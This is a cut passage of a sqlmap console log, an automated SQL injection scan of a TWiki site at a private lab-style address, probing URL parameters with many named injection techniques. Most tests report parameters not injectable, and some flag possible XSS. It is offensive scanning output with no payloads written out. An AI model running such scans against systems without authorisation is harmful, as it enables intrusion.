[19:57:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:57:56] [INFO] testing 'Oracle AND time-based blind'
[19:57:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:58:02] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:58:07] [WARNING] URI parameter '#2*' is not injectable
[19:58:07] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 151:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingRules?skin=print
do you want to test this URL? [Y/n/q]
> Y
[19:58:07] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingRules?skin=print'
[19:58:08] [INFO] testing connection to the target URL
[19:58:08] [INFO] testing if the target URL is stable
[19:58:09] [INFO] target URL is stable
[19:58:09] [INFO] testing if GET parameter 'skin' is dynamic
[19:58:09] [INFO] confirming that GET parameter 'skin' is dynamic
[19:58:09] [INFO] GET parameter 'skin' is dynamic
[19:58:09] [INFO] heuristics detected web page charset 'ascii'
[19:58:09] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[19:58:09] [INFO] testing for SQL injection on GET parameter 'skin'
[19:58:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:58:09] [WARNING] reflective value(s) found and filtering out
[19:58:11] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:58:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:58:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:58:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:58:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:58:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:58:14] [INFO] testing 'MySQL inline queries'
[19:58:14] [INFO] testing 'PostgreSQL inline queries'
[19:58:14] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:58:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:58:15] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:58:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:58:16] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:58:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:58:18] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:58:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:58:19] [INFO] testing 'Oracle AND time-based blind'
[19:58:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:58:20] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:58:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:58:36] [WARNING] GET parameter 'skin' is not injectable
[19:58:36] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 152:
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TextFormattingRules?rev1=1.38&rev2=1.37
do you want to test this URL? [Y/n/q]
> Y
[19:58:36] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TextFormattingRules?rev1=1.38&rev2=1.37'
[19:58:36] [INFO] testing connection to the target URL
[19:58:36] [INFO] testing if the target URL is stable
[19:58:37] [INFO] target URL is stable
[19:58:37] [INFO] testing if GET parameter 'rev1' is dynamic
[19:58:37] [WARNING] GET parameter 'rev1' does not appear dynamic
[19:58:37] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[19:58:37] [INFO] testing for SQL injection on GET parameter 'rev1'
[19:58:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:58:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:58:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:58:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:58:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:58:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:58:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:58:41] [INFO] testing 'MySQL inline queries'
[19:58:41] [INFO] testing 'PostgreSQL inline queries'
[19:58:41] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:58:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:58:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:58:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:58:42] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:58:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:58:43] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:58:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:58:44] [INFO] testing 'Oracle AND time-based blind'
[19:58:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:58:45] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:58:51] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:58:57] [WARNING] GET parameter 'rev1' is not injectable
[19:58:57] [INFO] testing if GET parameter 'rev2' is dynamic
[19:58:57] [WARNING] GET parameter 'rev2' does not appear dynamic
[19:58:57] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[19:58:57] [INFO] testing for SQL injection on GET parameter 'rev2'
[19:58:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:58:59] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:59:01] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:59:01] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:59:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:59:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:59:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:59:04] [INFO] testing 'MySQL inline queries'
[19:59:05] [INFO] testing 'PostgreSQL inline queries'
[19:59:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:59:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:59:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:59:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:59:08] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:59:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:59:09] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:59:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:59:10] [INFO] testing 'Oracle AND time-based blind'
[19:59:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:59:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:59:22] [WARNING] GET parameter 'rev2' is not injectable
[19:59:22] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 153:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingRules?rev=1.37
do you want to test this URL? [Y/n/q]
> Y
[19:59:22] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingRules?rev=1.37'
[19:59:22] [INFO] testing connection to the target URL
[19:59:23] [INFO] testing if the target URL is stable
[19:59:24] [INFO] target URL is stable
[19:59:24] [INFO] testing if GET parameter 'rev' is dynamic
[19:59:24] [WARNING] GET parameter 'rev' does not appear dynamic
[19:59:24] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[19:59:24] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[19:59:24] [INFO] testing for SQL injection on GET parameter 'rev'
[19:59:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:59:24] [WARNING] reflective value(s) found and filtering out
[19:59:26] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:59:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:59:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:59:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:59:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:59:28] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:59:29] [INFO] testing 'MySQL inline queries'
[19:59:29] [INFO] testing 'PostgreSQL inline queries'
[19:59:29] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:59:29] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:59:30] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:59:30] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:59:30] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:59:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:59:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:59:32] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:59:33] [INFO] testing 'Oracle AND time-based blind'
[19:59:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:59:33] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:59:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:59:48] [WARNING] GET parameter 'rev' is not injectable
[19:59:48] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[19:59:48] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TextFormattingRules?rev1=1.37&rev2=1.36'
[19:59:48] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingRules?rev=1.36'
URL 154:
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/TextFormattingRules?template=oopsmore&param1=1.38&param2=1.38
do you want to test this URL? [Y/n/q]
> Y
[19:59:48] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/TextFormattingRules?template=oopsmore&param1=1.38&param2=1.38'
[19:59:48] [INFO] testing connection to the target URL
[19:59:49] [INFO] testing if the target URL is stable
[19:59:49] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[19:59:49] [INFO] testing if GET parameter 'template' is dynamic
[19:59:49] [INFO] confirming that GET parameter 'template' is dynamic
[19:59:50] [INFO] GET parameter 'template' is dynamic
[19:59:50] [INFO] heuristics detected web page charset 'ascii'
[19:59:50] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[19:59:50] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[19:59:50] [INFO] testing for SQL injection on GET parameter 'template'
[19:59:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:59:50] [WARNING] reflective value(s) found and filtering out
[19:59:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:59:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:59:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:59:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:59:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:59:53] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:59:53] [INFO] testing 'MySQL inline queries'
[19:59:53] [INFO] testing 'PostgreSQL inline queries'
[19:59:53] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:59:53] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:59:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:59:54] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:59:54] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:59:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:59:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:59:55] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:59:56] [INFO] testing 'Oracle AND time-based blind'
[19:59:56] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:59:56] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:00:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:00:05] [WARNING] GET parameter 'template' is not injectable
[20:00:05] [INFO] testing if GET parameter 'param1' is dynamic
[20:00:05] [WARNING] GET parameter 'param1' does not appear dynamic
[20:00:05] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[20:00:05] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[20:00:05] [INFO] testing for SQL injection on GET parameter 'param1'
[20:00:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:00:07] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:00:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:00:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:00:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:00:09] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:00:10] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:00:10] [INFO] testing 'MySQL inline queries'
[20:00:10] [INFO] testing 'PostgreSQL inline queries'
[20:00:10] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:00:10] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:00:11] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:00:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:00:11] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:00:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:00:13] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:00:13] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:00:14] [INFO] testing 'Oracle AND time-based blind'
[20:00:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:00:22] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:00:29] [WARNING] GET parameter 'param1' is not injectable
[20:00:29] [INFO] testing if GET parameter 'param2' is dynamic
[20:00:29] [WARNING] GET parameter 'param2' does not appear dynamic
[20:00:29] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[20:00:30] [INFO] testing for SQL injection on GET parameter 'param2'
[20:00:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:00:31] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:00:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:00:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:00:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:00:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:00:34] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:00:34] [INFO] testing 'MySQL inline queries'
[20:00:34] [INFO] testing 'PostgreSQL inline queries'
[20:00:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:00:34] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:00:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:00:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:00:36] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:00:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:00:37] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:00:37] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:00:38] [INFO] testing 'Oracle AND time-based blind'
[20:00:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:00:41] [INFO] target URL appears to be UNION injectable with 10 columns
[20:00:41] [WARNING] applying generic concatenation with double pipes ('||')
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[20:00:45] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[20:00:50] [INFO] testing 'MySQL UNION query (11) - 1 to 10 columns'
[20:00:59] [WARNING] GET parameter 'param2' is not injectable
[20:00:59] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 155:
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiForms?t=1441457582
do you want to test this URL? [Y/n/q]
> Y
[20:00:59] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiForms?t=1441457582'
[20:00:59] [INFO] testing connection to the target URL
[20:00:59] [INFO] testing if the target URL is stable
[20:01:00] [INFO] target URL is stable
[20:01:00] [INFO] testing if GET parameter 't' is dynamic
[20:01:00] [WARNING] GET parameter 't' does not appear dynamic
[20:01:00] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[20:01:01] [INFO] testing for SQL injection on GET parameter 't'
[20:01:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:01:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:01:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:01:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:01:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:01:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:01:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:01:04] [INFO] testing 'MySQL inline queries'
[20:01:04] [INFO] testing 'PostgreSQL inline queries'
[20:01:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:01:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:01:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:01:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:01:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:01:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:01:07] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:01:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:01:08] [INFO] testing 'Oracle AND time-based blind'
[20:01:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:01:08] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:01:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:01:20] [WARNING] GET parameter 't' is not injectable
[20:01:20] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 156:
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=TWiki *Forms[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[20:01:20] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=TWiki *Forms[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[20:01:20] [INFO] testing connection to the target URL
[20:01:21] [INFO] testing if the target URL is stable
[20:01:21] [INFO] target URL is stable
[20:01:21] [INFO] testing if URI parameter '#1*' is dynamic
[20:01:21] [INFO] confirming that URI parameter '#1*' is dynamic
[20:01:21] [INFO] URI parameter '#1*' is dynamic
[20:01:22] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[20:01:22] [INFO] testing for SQL injection on URI parameter '#1*'
[20:01:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:01:22] [WARNING] reflective value(s) found and filtering out
[20:01:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:01:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:01:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:01:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:01:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:01:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:01:26] [INFO] testing 'MySQL inline queries'
[20:01:26] [INFO] testing 'PostgreSQL inline queries'
[20:01:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:01:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:01:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:01:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:01:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:01:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:01:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:01:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:01:30] [INFO] testing 'Oracle AND time-based blind'
[20:01:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:01:30] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:01:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:01:41] [WARNING] URI parameter '#1*' is not injectable
[20:01:41] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 157:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiForms?skin=print
do you want to test this URL? [Y/n/q]
> Y
[20:01:41] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiForms?skin=print'
[20:01:41] [INFO] testing connection to the target URL
[20:01:41] [INFO] testing if the target URL is stable
[20:01:42] [INFO] target URL is stable
[20:01:42] [INFO] testing if GET parameter 'skin' is dynamic
[20:01:42] [INFO] confirming that GET parameter 'skin' is dynamic
[20:01:42] [INFO] GET parameter 'skin' is dynamic
[20:01:43] [INFO] heuristics detected web page charset 'ascii'
[20:01:43] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[20:01:43] [INFO] testing for SQL injection on GET parameter 'skin'
[20:01:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:01:43] [WARNING] reflective value(s) found and filtering out
[20:01:44] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:01:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:01:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:01:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:01:46] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:01:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:01:47] [INFO] testing 'MySQL inline queries'
[20:01:47] [INFO] testing 'PostgreSQL inline queries'
[20:01:47] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:01:47] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:01:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:01:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:01:49] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:01:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:01:50] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:01:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:01:51] [INFO] testing 'Oracle AND time-based blind'
[20:01:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:01:52] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:01:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:02:05] [WARNING] GET parameter 'skin' is not injectable
[20:02:05] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 158:
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiForms?rev1=1.17&rev2=1.16
do you want to test this URL? [Y/n/q]
> Y
[20:02:05] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiForms?rev1=1.17&rev2=1.16'
[20:02:05] [INFO] testing connection to the target URL
[20:02:05] [INFO] testing if the target URL is stable
[20:02:06] [INFO] target URL is stable
[20:02:06] [INFO] testing if GET parameter 'rev1' is dynamic
[20:02:06] [WARNING] GET parameter 'rev1' does not appear dynamic
[20:02:06] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[20:02:07] [INFO] heuristic (XSS) test shows that GET parameter 'rev1' might be vulnerable to XSS attacks
[20:02:07] [INFO] testing for SQL injection on GET parameter 'rev1'
[20:02:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:02:07] [WARNING] reflective value(s) found and filtering out
[20:02:08] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:02:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:02:09] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:02:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:02:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:02:10] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:02:10] [INFO] testing 'MySQL inline queries'
[20:02:10] [INFO] testing 'PostgreSQL inline queries'
[20:02:11] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:02:11] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
